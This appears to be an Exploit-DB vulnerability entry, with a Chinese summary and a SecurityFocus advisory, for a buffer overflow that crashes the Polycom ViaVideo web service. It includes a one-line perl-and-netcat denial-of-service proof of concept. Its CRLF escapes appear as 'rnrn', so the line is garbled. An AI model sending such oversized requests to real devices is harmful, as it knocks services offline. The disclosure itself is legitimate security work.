https://www.exploit-db.com/exploits/21941
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-435

PolycomViaVideo2.2和3.0版本的web服务器中存在缓冲区溢出漏洞。远程攻击者借助超长HTTPGET请求导致服务拒绝（崩溃）。

source: http://www.securityfocus.com/bid/5964/info

A buffer overflow vulnerability has been reported for ViaVideo.

An attacker can exploit this vulnerability by issuing excessively long 'GET' requests to ViaVideo devices. This will cause an error in the 'vvws.dll' library and will cause the ViaVideo service to crash.

Although unconfirmed, it may be possible for a remote attacker to exploit this issue to execute arbitrary system commands with the privileges of the ViaVideo process. 

perl -e 'print "GET " . "A" x 4132 . " HTTP/1.0rnrn";' | netcat 10.1.0.1 3603

来源:BID
名称:5964
链接:http://www.securityfocus.com/bid/5964
来源:XF
名称:viavideo-webserver-get-bo(10359)
链接:http://www.iss.net/security_center/static/10359.php